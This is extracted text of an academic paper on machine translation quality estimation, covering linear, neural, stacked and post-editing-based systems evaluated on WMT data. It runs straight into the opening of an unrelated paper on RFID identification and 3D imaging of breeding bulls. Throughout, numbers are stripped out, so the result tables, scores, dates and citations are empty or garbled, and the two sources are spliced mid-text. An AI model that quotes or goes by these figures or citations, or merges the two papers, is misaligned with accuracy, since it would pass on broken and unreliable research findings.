w>φb(s,t,a,yi,yi− ). ( ) above, w is a vector of weights, φu(s,t,a,yi) are unigram features (depending only on a single output label), φb(s,t,a,yi,yi− ) are bigram features (de- pending on consecutive output labels), and y and yn+ are special start/stop symbols. features. table shows the unigram and bigram features used in the linearqe system. like the baseline systems provided in wmt / , we in- clude features that depend on the target word and its aligned source word, as well as the context sur- rounding them. a distinctive aspect of our sys- tem is the inclusion of syntactic features, which will features involving the aligned source word are replaced by nil if the target word is unaligned. if there are multiple aligned source words, they are concatenated into a single feature. features label input (referenced by the ith target word) unigram yi ∧ . . . ∗bias ∗word, leftword, rightword ∗sourceword, sourceleftword, sourcerightword ∗largestngramleft/right, sourcelargestngramleft/right ∗postag, sourcepostag †word+leftword, word+rightword †word+sourceword, postag+sourcepostag simple bigram yi ∧yi− ∧ . . . ∗bias rich bigrams yi ∧yi− ∧ . . . all above yi+ ∧yi ∧ . . . word+sourceword, postag+sourcepostag syntactic yi ∧ . . . deprel, word+deprel headword/postag+word/postag leftsibword/postag+word/postag rightsibword/postag+word/postag grandword/postag+headword/postag+word/postag table : features used in the linearqe system (see martins et al., for a detailed description). features marked with ∗ are included in the wmt baseline system. those marked with † were proposed by kreutzer et al. ( ). show to be useful to detect grammatically incor- rect constructions. we use features that involve the dependency relation, the head word, and second- order sibling and grandparent structures. features involving part-of-speech (pos) tags and syntactic information are obtained with turbotagger and tur- boparser (martins et al., ). training. the feature weights are learned by run- ning epochs of the max-loss mira algorithm (crammer et al., ), with regularization con- stant c ∈{ −k} k= and a hamming cost function placing a higher penalty on false positives than on false negatives (cfp ∈ { . , . , . . . , . },cfn = − cfp ), to account for the existence of fewer bad labels than ok labels in the data. these values are tuned on the development set. results and feature contribution. table shows the performance of the linearqe system. to help understand the contribution of each group of features, we evaluated different variants of the linearqe system on the development sets of wmt / . as expected, the use of bigrams im- proves the simple unigram model, and the syntac- while syntactic features have been used previously in sentence-level qe (rubino et al., ), they have never been applied to the finer-grained word-level variant tackled here. http://www.cs.cmu.edu/˜ark/turboparser. features wmt (f bad ) wmt (f mult ) unigrams only . . +simple bigram . . +rich bigrams . . +syntactic (full) . . table : performance on the wmt (en-es) and wmt (en-de) development sets of several configu- rations of linearqe. we report the official metric for these shared tasks, f bad for wmt and f mult for wmt . tic features help even further. the impact of these features is more prominent in wmt : the rich bi- gram features lead to scores about points above a sequential model with a single indicator bigram feature, and the syntactic features contribute another . points. the net improvement exceeds points over the unigram model. . neural system next, we describe the neural component of our pure qe system, which we call neuralqe. in wmt and wmt , the neural quetch system (kreutzer et al., ) and its ensemble with other neural mod- els (martins et al., ) were components of the winning systems. however, none of these neural models managed to outperform a linear model when x ff x x ff x x ff + ... ... bigru ... ... bigru softmax ok/bad source word source pos target word target pos em be d d in gs x x x x figure : architecture of our neuralqe system. considered in isolation—for example, quetch ob- tained a f bad of . % in the wmt test set, far below the . % score of the linear system built by the same team. by contrast, our carefully en- gineered neuralqe model attains a performance superior to that of the linear system, as we shall see. architecture. the architecture of neuralqe is depicted in figure . we used keras (chollet, ) to implement our model. the system receives as input the source and target sentences s and t, their word-level alignments a, and their corresponding pos tags obtained from turbotagger. the input layer follows a similar architecture as quetch, with the addition of pos features. a vector rep- resenting each target word is obtained by concate- nating the embedding of that word with those of the aligned word in the source. the immediate left and right contexts for source and target words are also concatenated. we use the pre-trained - dimensional polyglot word embeddings (al-rfou et al., ) for english, german, and spanish, and re- fine them during training. in addition to this, pos tags for each source and target word are also em- bedded and concatenated. pos embeddings have size and are initialized as described by glorot and bengio ( ). a dropout probability of . is ap- plied to the resulting vector representations. the following layers are then applied in sequence: . two feed-forward layers of size with recti- fied linear units (relu; nair and hinton ( )); for the cases in which there are multiple source words aligned to the same target word, the embeddings are averaged. . a layer with bidirectional gated recurrent units (bigru, cho et al. ( )) of size , where forward and backward vectors are concatenated, trained with layer normalization (ba et al., ); . two feed-forward relu layers of size ; . a bigru layer of size with identical config- uration to the previous bigru; . two more feed-forward relu layers of sizes and , respectively. as the output layer, a softmax transformation over the ok/bad labels is applied. the choice for this architecture was dictated by experiments on the wmt development data, as we explain next. training. we train the model with the rmsprop algorithm (tieleman and hinton, ) by minimiz- ing the cross-entropy with a linear penalty for bad word predictions, as in kreutzer et al. ( ). we set the bad weight factor to . . all hyperparameters are adjusted based on the development set. target sentences are bucketed by length and then processed in batches (without any padding or truncation). results and architectural choices. the final re- sults are shown in table . overall, the final neu- ralqe model achieves an f mult score of . % on the wmt development set, compared with the . % obtained with the linearqe system (cf. table ). this contrasts with previous neural systems, such as quetch (kreutzer et al., ) and any of the three neural systems developed by martins et al. ( ), which could not outperform a rich feature linear classifier. to justify the most relevant choices regarding the architecture of neuralqe, we also evaluated sev- eral variations of it on the wmt development set. the use of recurrent layers yields the largest con- tribution to the performance of neuralqe, as the scores drop sharply (by more than points) if they are replaced by feed-forward layers (which would correspond to a mere deeper quetch model). the first bigru is particulary effective, as scores drop more than points if it is removed. the use of layer normalization on the recurrent layers also con- tributes positively (+ . ) to the final score. as ex- pected, the use of pos tags adds another large im- provement: everything staying the same, the model model f mult neuralqe . no pos tags . (- . ) replace bigru by ff . (- . ) only the first bigru . (- . ) only the second bigru . (- . ) remove ff between bigrus . (- . ) narrower layers . (- . ) broader layers . (- . ) one more layer at the end . (- . ) no layer normalization . (- . ) table : effect of architectural changes in neuralqe on the wmt development set. without pos tags as input performs almost . points worse. finally, varying the size of the hidden layers and the depth of the network hurts the final model’s performance, albeit more slightly. . stacking neural and linear models we now stack the neuralqe system (§ . ) into the linearqe system (§ . ) as an ensemble strat- egy; we call the resulting system stackedqe. stacking architectures (wolpert, ; breiman, ) have proved effective in structured nlp prob- lems (cohen and de carvalho, ; martins et al., ). the underlying idea is to combine two sys- tems by letting the prediction of the first system be used as an input feature for the second system. dur- ing training, it is necessary to jackknife the first sys- tem’s predictions to avoid overfitting the training set. this is done by splitting the training set in k folds (we set k = ) and training k different instances of the first system, where each instance is trained on k − folds and makes predictions for the left-out fold. the concatenation of all the predictions yields an unbiased training set for the second classifier. neural intra-ensembles. we also evaluate the performance of intra-ensembled neural systems. we train independent instances of neuralqe with dif- ferent random initializations and different data shuf- fles, following the approach of jean et al. ( ) in neural mt. in tables – , we report the performance on the wmt and wmt datasets of systems en- sembling and of these instances, called respec- tively neuralqe- and neuralqe- . the in- model f bad dev f bad test best system in wmt . - . quetch+ ( nd best) – . linearqe . . neuralqe . . neuralqe- . . neuralqe- . . stackedqe . . table : performance of the pure qe systems on the wmt datasets. the best performing system in the wmt competition was by esplà-gomis et al. ( ), followed by kreutzer et al. ( )’s quetch+, which is also an ensemble of a linear and a neural system. model f mult dev f mult test best system in wmt . . unbabel-linear ( nd best) . . linearqe . . neuralqe . . neuralqe- . . neuralqe- . . stackedqe . . table : performance of the pure qe systems on the wmt datasets. the best performing system in the wmt competition was by martins et al. ( ), fol- lowed by a linear system developed by the same team (unbabel-linear). stances are ensembled by taking the averaged prob- ability of each word being bad. we see consistent benefits (both for wmt and wmt ) in ensem- bling neural systems and (somewhat surprisingly) some degradation with ensembles of . stacking architecture. the individual instances of the neural systems are incorporated in the stacking architecture as different features, yield- ing stackedqe. in total, we have predictions (probability values given by each neuralqe sys- tem) for every word in the training, development and test datasets. these predictions are plugged as addi- tional features in the linearqe model. as uni- gram features, we used one real-valued feature for every model prediction at each position, conjoined with the label. as bigram features, we used two real- valued features for every model prediction at the two positions, conjoined with the label pair. the results obtained with this stacked architecture on the wmt and wmt datasets are shown re- spectively in tables and . in wmt , it is un- clear if stacking helps over the best intra-ensembled neural system, with a slight improvement in the development set, but a degradation in the test set. in wmt , however, stacking is clearly beneficial, with a boost of about points over the best intra- ensembled neural system and – points above the linear system, both in the development and test par- titions. for the remainder of this paper, we will take stackedqe as our pure qe system. ape-based quality estimation now that we have described a pure qe system, we move on to an ape-based qe system (apeqe). our starting point is the system submitted by the adam mickiewicz university (amu) team to the ape task of wmt (junczys-dowmunt and grundkiewicz, ). they explored the applica- tion of neural translation models to the ape problem and achieved good results by treating different mod- els as components in a log-linear model, allowing for multiple inputs (the source s and the translated sentence t) that were decoded to the same target lan- guage (post-edited translation p). two systems were considered, one using s as the input (s → p) and another using t as the input (t → p). a simple string-matching penalty integrated within the log- linear model was used to control for higher faithful- ness with regard to the raw mt output. the penalty fires if the ape system proposes a word in its output that has not been seen in t. to overcome the problem of too little training data, junczys-dowmunt and grundkiewicz ( ) generated large amounts of artificial data via round- trip translations: a large corpus of monolingual sentences is first gathered for the target language in the domain of interest (each sentence is regarded as an artificial post-edited sentence p); then an mt sys- tem is ran to translate these sentences to the source language (which are regarded as the source sen- tences s), and another mt system in the reverse di- rection translates the latter back to the target lan- guage (playing the role of the translations t). the artificial data is filtered to match the hter statistics of the training and development data for the shared task. their submission improved over the uncor- rected baseline on the unseen wmt test set by - . % ter and + . % bleu and outperformed any other system submitted to the shared-task by a large margin. . training the ape system we reproduce the experiments from junczys- dowmunt and grundkiewicz ( ) using nematus (sennrich et al., ) for training and amunmt (junczys-dowmunt et al., ) for decoding. as stated in § . , jackknifing is required to avoid overfitting during the training procedure of the stacked classifiers (§ ), therefore we start by prepar- ing four jackknifed models. we perform the follow- ing steps: • we divide the original wmt training set into four equally sized parts, maintaining correspon- dences between different languages. four new training sets are created by leaving out one part and concatenating the remaining three parts. • for each of the four new training sets, we train one ape model on a concatenation of a smaller set of artificial data (denoted as “round-trip.n ” in junczys-dowmunt and grundkiewicz ( ), consisting of , sentence triples) and a - fold oversampled new training set. each of these newly created four ape models has not seen a dif- ferent part of the quartered original training data. • to avoid overfitting, we use scaling dropout over gru steps and input embeddings, with dropout probabilities . , and over source and target words with probabilities . (sennrich et al., ). • we use adam (kingma and ba, ) instead of adadelta (zeiler, ). • we train both models (s → p and t → p) un- til convergence up to epochs, saving model checkpoints every , mini-batches. the artificial filtered data has been made available by the authors at https://github.com/emjotde/amunmt/ wiki/amunmt-for-automatic-post-editing. currently available in the mrt branch of nematus at https://github.com/rsennrich/nematus system wmt wmt best system . . uncorrected baseline . . ape t → p . . ape s → p . . ape ter-tuned . . table : ter scores on the official wmt and wmt test sets for the ape task. lower is better. • the last four model checkpoints of each train- ing run are averaged element-wise (junczys- dowmunt et al., ) resulting in new single models with generally improved performance. to verify the quality of the ape system, we en- semble the resulting models ( times s → p and times t → p) and add the ape penalty described in junczys-dowmunt and grundkiewicz ( ). this large ensemble across folds is only used during test time. for creating the jackknifed training data, only the models from the corresponding fold are used. since we combine models of different types, we tune weights on the development set with mert (och, ) towards ter, yielding the model denoted as “ape ter-tuned”. results are listed in table for the ape shared task (wmt ). for the purely s → p and t → p ensembles, models are weighted equally. we achieve slightly better results in terms of ter, the main task metric, than the original sys- tem, using less data. for completeness, we also apply this proce- dure to wmt data, generating a similar resource of k artificial english-spanish-spanish post- editing triplets via roundtrip translation. the train- ing, jackknifing and ensembling methods are the same as for the wmt setting. for the wmt ape shared task, results are less persuasive than for wmt : none of the shared task participants was able to beat the uncorrected baseline and our sys- tem fails at this as well. however, we produced the we found mert to work better when tuning towards ter than kb-mira which has been used in the original paper. our artificially created data might suffer from a higher mis- match between training and development data. while we were able to match the ter statistics of the dev set, bleu scores are several points lower. the artificial wmt data we created in junczys-dowmunt and grundkiewicz ( ) matches both, ter and bleu scores, of the respective development set. f bad dev f bad test ape t → p . . ape s → p . . ape ter-tuned . . apeqe . . table : performance of ape-based qe systems on the wmt development and test sets. f mult dev f mult test ape t → p . . ape s → p . . ape ter-tuned . . apeqe . . table : performance of ape-based qe systems on the wmt development and test sets. second strongest system for case-sensitive ter (ta- ble , wmt ) and the strongest for case-insensitve ter ( . vs. . ). . adaptation to qe and task-specific tuning as described in § , ape outputs can be turned into word quality labels using ter-based word align- ments. somewhat surprisingly, among the ape sys- tems introduced above, we observe in table that the s → p ape system is the so-far strongest stand- alone qe system for the wmt task in this work. this system is essentially a retrained neural mt component without any additional features. the t → p system and the ter-tuned ape ensemble are much weaker in terms of f mult . this is less surprising in the case of the full ensemble, as it has been tuned towards ter for the ape task specif- ically. however, we can obtain even better ape- based qe systems for both shared task settings by tuning the full ape ensembles towards f mult , the official wmt qe metric, and towards f bad for wmt . with this approach, we produce our new best stand-alone qe-systems for both shared tasks, which we denote as apeqe. note that this system resembles other qe approaches which use pseudo-reference features (albrecht and hwa, ; soricut and narsale, ; shah et al., ), since the s → p is essentially an “alternative” mt system. using again mert and executing iterations on the offi- cial development set with an n-best list size of . f bad dev f bad test best system in wmt . . linearqe . . neuralqe . . stackedqe . . apeqe . . fullstackedqe . . table : performance of the several word-level qe sys- tems on the wmt development and test datasets. the baseline is the best participating system in wmt , from esplà-gomis et al. ( ). full stacked system finally, we consider a larger stacked system where we stack both neuralqe and apeqe into lin- earqe. this will mix pure qe with ape-based qe systems; we call the result fullstackedqe. the procedure is analogous to that described in § . , with one extra binary feature for the ape-based word quality label predictions. for training, we used jackknifing as described in § . . . word-level qe the performance of the fullstackedqe system on the wmt and wmt datasets are shown in tables – . we compare with the other systems introduced in this paper, and with the best partici- pating systems at wmt – (esplà-gomis et al., ; martins et al., ). we can see that the ape-based and the pure qe systems are complementary: the full combination of the linear, neural, and ape-based systems improves the scores with respect to the best individual sys- tem (apeqe) by about point in wmt and points in wmt . overall, we obtain for wmt an f mult score of . %, a new state of the art, and an absolute gain of + . % over martins et al. ( ). this is a remarkable improvement that can pave the way for a wider adoption of word-level qe systems in industrial settings. for wmt , we also obtain a new state of the art, with a less impres- sive gain of + . % over the best previous system. in § we analyze the errors made by the pure and the ape-based qe systems to better understand how they complement each other. f mult dev f mult test best system in wmt . . linearqe . . neuralqe . . stackedqe . . apeqe . . fullstackedqe . . table : performance of the several word-level qe sys- tems on the wmt development and test datasets. the baseline is the best participating system in wmt , from the unbabel team (martins et al., ). . sentence-level qe encouraged by the strong results obtained with the fullstackedqe system in word-level qe, we in- vestigate how we can adapt this system for hter prediction at sentence level. prior work (de souza et al., ) incorporated word-level quality pre- dictions as features in a sentence-level qe system, training a feature-based linear classifier. here, we show that a very simple conversion, which requires no training or tuning, is enough to obtain a substan- tial improvement over the state of the art. for the ape system, it is easy to obtain a predic- tion for hter: we can simply measure the hter between the translated sentence t and the predicted corrected sentence p̂. for a pure qe system, we ap- ply the following word-to-sentence conversion tech- nique: (i) run a qe system to obtain a sequence of ok and bad word quality labels; (ii) use the frac- tion of bad labels as an estimate for hter. note that this procedure, while not requiring any training, is far from perfect. words that are not in the trans- lated sentence but exist in the reference post-edited sentence do not originate bad labels, and therefore will not contribute to the hter estimate. yet, as we will see, this procedure applied to the stackedqe system (i.e. without the apeqe component) is al- ready sufficient to obtain state of the art results. fi- nally, to combine the ape and pure qe systems to- ward sentence-level qe, we simply take the average of the two hter predictions above. table shows the results obtained with our pure qe system (stackedqe), with our ape- based system (apeqe), and with the combination of the two (fullstackedqe). as baselines, we pearson dev pearson test spearman dev spearman test wmt best system in wmt (ranking) – . – . best system in wmt (hter) – . – . stackedqe . . . . apeqe . . . . fullstackedqe . . . . wmt best system in wmt (ranking) – . – – best system in wmt (hter) – . – . stackedqe . . . . apeqe . . . . fullstackedqe . . . . table : performance of our sentence-level qe systems on the wmt an wmt datasets, as measured by the wmt official evaluation script. the baselines are the best wmt – systems in the hter prediction track (bicici et al., ; kozlova et al., ) and in the sentence ranking track (langlois, ; kim and lee, ). report the performance of the two best systems in the sentence-level qe tasks at wmt and wmt (bicici et al., ; langlois, ; kozlova et al., ; kim and lee, ). the results are striking: for wmt , even our weakest system (stackedqe) with the simple con- version procedure above is already sufficient to ob- tain state of the art results, outperforming kozlova et al. ( ) and kim and lee ( ) by a considerable margin. the apeqe system gives a very large boost over these scores, which are further increased by the combined fullstackedqe system. overall, we obtain absolute gains of + . % in pearson’s r cor- relation score for hter prediction, and + . % in spearman’s ρ correlation for sentence ranking, a considerable advance over the previous state of the art. for wmt , we also obtain a new state of the art, with less sharp (but still significant) improve- ments: + . % in pearson’s r correlation score, and + . % in spearman’s ρ correlation. error analysis performance over sentence length. to better un- derstand the differences in performance between the pure qe system (stackedqe) and the ape-based system (apeqe), we analyze how the two systems, as well as their combination (fullstackedqe), perform as a function of the sentence length. figure shows the averaged number of bad pre- dictions made by the three systems for different sen- tences lengths, in the wmt development set. for comparison, we show also the true average num- ber of bad words in the gold standard. we ob- serve that, for short sentences (less than words), the pure qe system tends to be too optimistic (i.e., it underpredicts bad words) and the ape-based sys- tem too pessimistic (overpredicting them). in the range of - words, the pure qe system matches the proportion of bad words more accurately than the ape-based system. for medium/long sentences, we observe the opposite behavior (this is partic- ularly clear in the - word range), with the ape-based system being generally better. on the other hand, the combination of the two systems (fullstackedqe) manages to find a good bal- ance between these two biases, being much closer to the true proportion of bad labels for both shorter and longer sentences than any of the individual sys- tems. this shows that the two systems complement each other well in the combination. illustrative examples. table shows concrete examples of quality predictions on the wmt de- velopment data. in the top example, we can see that the ape system correctly replaced angleichungs- farbe by mischfarbe, but is under-corrective in other parts. the apeqe system therefore misses several bad words, but manages to get the correct label (ok) for den. by contrast, the pure qe system er- roneously flags this word as incorrect, but it makes the right decision on farbton and zu erstellen, be- ing more accurate than apeqe. the combination of the two systems (pure qe and apeqe) leads to source combines the hue value of the blend color with the luminance and saturation of the base color to create the result color . mt kombiniert den farbton wert der angleichungsfarbe mit der luminanz und sättigung der grundfarbe zu erstellen . pe (reference) kombiniert den farbtonwert der mischfarbe mit der luminanz und sättigung der grundfarbe . ape kombiniert den farbton der mischfarbe mit der luminanz und die sättigung der grundfarbe , um die ergebnisfarbe zu erstellen . stackedqe kombiniert den farbton wert der angleichungsfarbe mit der luminanz und sättigung der grund- farbe zu erstellen . apeqe kombiniert den farbton wert der angleichungsfarbe mit der luminanz und sättigung der grund- farbe zu erstellen . fullstackedqe kombiniert den farbton wert der angleichungsfarbe mit der luminanz und sättigung der grund- farbe zu erstellen . source the video preview plug - in supports rgb , grayscale , and indexed images . mt mit dem zusatzmodul “ videovorschau ” unterstützt rgb- , graustufen- und indizierte bilder . pe (reference) das zusatzmodul “ videovorschau ” unterstützt rgb- , graustufen- und indizierte bilder . ape das dialogfeld “ videovorschau ” unterstützt rgb- , graustufen- und indizierte bilder . stackedqe mit dem zusatzmodul “ videovorschau ” unterstützt rgb- , graustufen- und indizierte bilder . apeqe mit dem zusatzmodul “ videovorschau ” unterstützt rgb- , graustufen- und indizierte bilder . fullstackedqe mit dem zusatzmodul “ videovorschau ” unterstützt rgb- , graustufen- und indizierte bilder . table : examples on wmt validation data. shown are the source and translated sentences, the gold post-edited sentences, the output of the ape system, and the qe predictions of our pure qe and ape-based qe systems as well as their combination. words predicted as ok are shown in green, those predicted as bad are shown in red, and differences between the translated and the post-edited sentences are shown in blue. for both examples, the full stacked system predicts all quality labels correctly. figure : averaged number of words predicted as bad by the different systems in the wmt gold dev set, for different bins of the sentence length. the correct sequential prediction. in the bottom ex- ample, the pure qe system assigns the correct label to zusatzmodul, while the ape system mistranslates this word to dialogfeld, leading to a wrong predic- tion by the apeqe system. on the other hand, pure qe misclassifies unterstützt rgb- as bad words, while the apeqe gets them right. overall, the apeqe is more accurate in this example. again, these decisions complement each other well, as can be seen by the combined qe system which outputs the correct word labels for the entire sentence. conclusions we have presented new state of the art systems for word-level and sentence-level qe that are consid- erably more accurate than previous systems on the wmt and wmt datasets. first, we proposed a new pure qe system which stacks a linear and a neural system, and is simpler and slighly more accurate than the currently best word-level system. then, by relating the tasks of ape and word-level qe, we derived a new ape- based qe system, which leverages additional artifi- cial roundtrip translation data, achieving a larger im- provement. finally, we combined the two systems via a full stacking architecture, boosting the scores even further. error analysis shows that the pure and ape-based systems are highly complementary. the full system was extended to sentence-level qe by virtue of a simple word-to-sentence conversion, re- quiring no further training or tuning. acknowledgments we thank the reviewers and the action edi- tor for their insightful comments. this work was partially supported by the the expert project (eu marie curie itn no. ), and by fundação para a ciência e tecnolo- gia (fct), through contracts uid/eea/ / and uid/cec/ / , the learnbig project (ptdc/eei-sii/ / ), the golocal project (grant cmuperi/tic/ / ), and the amazon academic research awards program. references rami al-rfou, bryan perozzi, and steven skiena. . polyglot: distributed word representations for multi- lingual nlp. in proceedings of the seventeenth con- ference on computational natural language learn- ing, pages – . joshua albrecht and rebecca hwa. . the role of pseudo references in mt evaluation. in proceedings of the third workshop on statistical machine transla- tion, pages – . eleftherios avramidis. . quality estimation for machine translation output using linguistic analysis and decoding features. in proceedings of the seventh workshop on statistical machine translation, pages – . jimmy lei ba, jamie ryan kiros, and geoffrey e hin- ton. . layer normalization. arxiv preprint arxiv: . . daniel beck, kashif shah, trevor cohn, and lucia spe- cia. . shef-lite: when less is more for transla- tion quality estimation. in proceedings of the eighth workshop on statistical machine translation, pages – . ergun bicici, qun liu, and andy way. . refer- ential translation machines for predicting translation quality and related statistics. in proceedings of the tenth workshop on statistical machine translation, pages – . ergun biçici. . referential translation machines for quality estimation. in proceedings of the eighth work- shop on statistical machine translation, pages – . john blatz, erin fitzgerald, george foster, simona gan- drabur, cyril goutte, alex kulesza, alberto sanchis, and nicola ueffing. . confidence estimation for machine translation. in proceedings of the interna- tional conference on computational linguistics, page . ondřej bojar, rajan chatterjee, christian federmann, barry haddow, chris hokamp, matthias huck, var- vara logacheva, , philipp koehn, , christof monz, matteo negri, pavel pecina, matt post, carolina scar- ton, lucia specia, and marco turchi. . findings of the workshop on statistical machine transla- tion. in proceedings of the tenth workshop on statis- tical machine translation, pages – . ondřej bojar, rajen chatterjee, christian federmann, yvette graham, barry haddow, matthias huck, anto- nio jimeno yepes, philipp koehn, varvara logacheva, christof monz, matteo negri, aurelie neveol, mari- ana neves, martin popel, matt post, raphael rubino, carolina scarton, lucia specia, marco turchi, karin verspoor, and marcos zampieri. . findings of the conference on machine translation. in pro- ceedings of the first conference on machine transla- tion, pages – . leo breiman. . stacked regressions. machine learning, : – . kyunghyun cho, bart van merriënboer, caglar gul- cehre, dzmitry bahdanau, fethi bougares, holger schwenk, and yoshua bengio. . learning phrase representations using rnn encoder-decoder for sta- tistical machine translation. in proceedings of empir- ical methods in natural language processing, pages – . françois chollet. . keras. https://github. com/fchollet/keras. william w. cohen and vitor r. de carvalho. . stacked sequential learning. in proceedings of in- ternational joint conference on artificial intelligence, pages – . koby crammer, ofer dekel, joseph keshet, shai shalev- shwartz, and yoram singer. . online passive- aggressive algorithms. journal of machine learning research, : – . josé g. c. de souza, jesús gonzález-rubio, christian buck, marco turchi, and matteo negri. . fbk- upv-uedin participation in the wmt quality esti- mation shared-task. in proceedings of the ninth work- shop on statistical machine translation, pages – . josé g. c. de souza, marcello federico, and has- san sawaf. . mt quality estimation for e- commerce data. in proceedings of mt summit xv, vol. : mt users’ track, pages – . miquel esplà-gomis, felipe sánchez-martı́nez, and mikel forcada. . ualacant word-level machine translation quality estimation system at wmt . in proceedings of the tenth workshop on statistical machine translation, pages – . xavier glorot and yoshua bengio. . understanding the difficulty of training deep feedforward neural net- works. in international conference on artificial intel- ligence and statistics, pages – . yvette graham. . improving evaluation of machine translation quality estimation. in proceedings of the annual meeting of the association for computational linguistics, pages – . sébastien jean, orhan firat, kyunghyun cho, roland memisevic, and yoshua bengio. . montreal neu- ral machine translation systems for wmt . in pro- ceedings of the tenth workshop on statistical machine translation, pages – . marcin junczys-dowmunt and roman grundkiewicz. . log-linear combinations of monolingual and bilingual neural machine translation models for auto- matic post-editing. in proceedings of the first confer- ence on machine translation, pages – . marcin junczys-dowmunt, tomasz dwojak, and hieu hoang. . is neural machine translation ready for deployment? a case study on translation directions. arxiv preprint arxiv: . . hyun kim and jong-hyeok lee. . recurrent neural network based translation quality estimation. in pro- ceedings of the first conference on machine transla- tion, pages – . diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. arxiv preprint arxiv: . . anna kozlova, mariya shmatova, and anton frolov. . ysda participation in the wmt quality es- timation shared task. in proceedings of the first con- ference on machine translation, pages – . julia kreutzer, shigehiko schamoni, and stefan riezler. . quality estimation from scratch (quetch): deep learning for word-level translation quality es- timation. in proceedings of the tenth workshop on statistical machine translation, pages – . david langlois. . loria system for the wmt quality estimation shared task. in proceedings of the tenth workshop on statistical machine transla- tion, pages – . ngoc quang luong, laurent besacier, and benjamin lecouteux. . lig system for word level qe task at wmt . in proceedings of the ninth work- shop on statistical machine translation, pages – . andré f. t. martins, dipanjan das, noah a. smith, and eric p. xing. . stacking dependency parsers. in proceedings of empirical methods for natural lan- guage processing, pages – . andré f. t martins, miguel b. almeida, and noah a. smith. . turning on the turbo: fast third-order non-projective turbo parsers. in proceedings of the annual meeting of the association for computational linguistics, pages – . andré f. t. martins, ramón astudillo, chris hokamp, and fabio n. kepler. . unbabel’s participation in the wmt word-level translation quality estima- tion shared task. in proceedings of the first confer- ence on machine translation, pages – . vinod nair and geoffrey e hinton. . rectified lin- ear units improve restricted boltzmann machines. in proceedings of the international conference on ma- chine learning, pages – . franz josef och. . minimum error rate training in statistical machine translation. in proceedings of the annual meeting on association for computational linguistics, pages – . raphael rubino, jennifer foster, joachim wagner, jo- hann roturier, rasul samad zadeh kaljahi, and fred hollowood. . dcu-symantec submission for the wmt quality estimation task. in proceedings of the seventh workshop on statistical machine transla- tion, pages – . rico sennrich, barry haddow, and alexandra birch. . edinburgh neural machine translation systems for wmt . in proceedings of the first conference on machine translation, pages – . kashif shah, trevor cohn, and lucia specia. . an investigation on the effectiveness of features for trans- lation quality estimation. in proceedings of the ma- chine translation summit, volume , pages – . michel simard, nicola ueffing, pierre isabelle, and roland kuhn. . rule-based translation with sta- tistical phrase-based post-editing. in proceedings of the second workshop on statistical machine transla- tion, pages – . matthew snover, bonnie dorr, richard schwartz, lin- nea micciulla, and john makhoul. . a study of translation edit rate with targeted human annotation. in proceedings of the th conference of the associa- tion for machine translation in the americas, pages – . radu soricut and sushant narsale. . combining quality prediction and system selection for improved automatic translation output. in proceedings of the seventh workshop on statistical machine translation, pages – . lucia specia, kashif shah, jose g.c. de souza, and trevor cohn. . quest - a translation quality estimation framework. in proceedings of the annual meeting of the association for computational linguis- tics: system demonstrations, pages – . lucia specia. . exploiting objective annotations for measuring translation post-editing effort. in proceed- ings of the th conference of the european associa- tion for machine translation, pages – . tijmen tieleman and geoffrey hinton. . rmsprop: divide the gradient by a running average of its recent magnitude. coursera: neural networks for ma- chine learning, ( ). marco turchi, antonios anastasopoulos, josé gc de souza, and matteo negri. . adaptive qual- ity estimation for machine translation. in proceedings of the annual meeting of the association for compu- tational linguistics, pages – . nicola ueffing and hermann ney. . word-level confidence estimation for machine translation. com- putational linguistics, ( ): – . d. wolpert. . stacked generalization. neural net- works, ( ): – . matthew d. zeiler. . adadelta: an adaptive learning rate method. arxiv preprint arxiv: . . submitted october accepted february published march corresponding author maria grazia cappai, mgcappai@uniss.it academic editor claudia bauzer medeiros additional information and declarations can be found on page doi . /peerj-cs. copyright cappai et al. distributed under creative commons cc-by . open access integrating the rfid identification system for charolaise breeding bulls with d imaging for virtual archive creation maria grazia cappai , filippo gambella , davide piccirilli , nicola graziano rubiu , corrado dimauro , antonio luigi pazzona and walter pinna research unit for animal nutrition, department of veterinary medicine, university of sassari, sassari, italy research unit for agriculture engineering of the department of agriculture, university of sassari, sassari, italy nureid foundation, nuragus, italy research unit for animal breeding sciences of the department of agriculture, university of sassari, sassari, italy abstract the individual electronic identification (eid) of cattle based on rfid technology ( . khz iso standard ) will definitely enter into force in european countries as an official means of animal identification from july . integrating eid with d digital images of the animal would lead to the creation of a virtual archive of breeding animals for the evaluation and promotion of morphology associated with economic traits, strategic in beef cattle production. the genetically-encoded morphology of bulls and cows together with the expression in the phenotype were the main drivers of omic technologies of beef cattle production. the evaluation of bulls raised for reproduction is mainly based on the conformation and heritability of traits, which culminates in muscle mass and optimized carcass traits in the offspring destined to be slaughtered. a bottom- up approach by way of swot analysis of the current morphological and functional evaluation process for bulls revealed a technological gap. the innovation of the process through the use of smart technologies was tested in the field. the conventional d scoring system based on visual inspection by breed experts was carried out on a d model of the live animal, which was found to be a faithful reproduction of live animal morphology, thanks to the non significant variance (p > . ) of means of the somatic measures determined on the virtual d model and on the real bull. the four main groups composing the scoring system of bull morphology can easily be carried out on the d model. these are as follows: ( ) muscular condition; ( ) skeletal development; ( ) functional traits; ( ) breed traits. the d-bull model derived from the structure from motion (sfm) algorithm displays a high tech profile for the evaluation of animal morphology in an upgraded system. subjects bioinformatics, computer vision, data science, spatial and geographic information systems keywords electronic identification, digital image, bull morphology, data sharing, stakeholder, d digital image how to cite this article cappai mg, gambella f, piccirilli d, rubiu ng, dimauro c, pazzona al, pinna w. . integrating the rfid identification system for charolaise breeding bulls with d imaging for virtual archive creation. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:mgcappai@uniss.it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. introduction the current identification system for cattle in european union countries will be modified starting from th july , the date on which eu reg / will be implemented. the individual electronic identification (eid) of cattle based on radio frequency technology (rfid, . khz) will become an official means of cattle identification, in addition to the double plastic ear tag identification system (eu reg / ). the automatic rfid- based identification of cattle will be part of the innovation process of animal recording, encompassing a digitized and real time automatically generated database, within the so-called precision livestock farming (plf). in view of the potential offered by rfid technology, several perspectives may lead to advanced production systems, of particular importance both for regulation compliance and the profitable management of herds. in this scenario, production goals differ depending on whether dairy or beef cattle are considered. modern beef cattle production relies on decades of animal selection, oriented to the improvement of breeding system efficiency, basically to reduce costs and increase profits. bovine breeds display morphological differences relating to production goals, if dairy or beef cattle are considered. in particular, beef cattle breeds are selected to improve carcass worth and the evaluation of body morphology of the live animal encompasses the interplay between genetic selection, breeding practices and expression of desirable 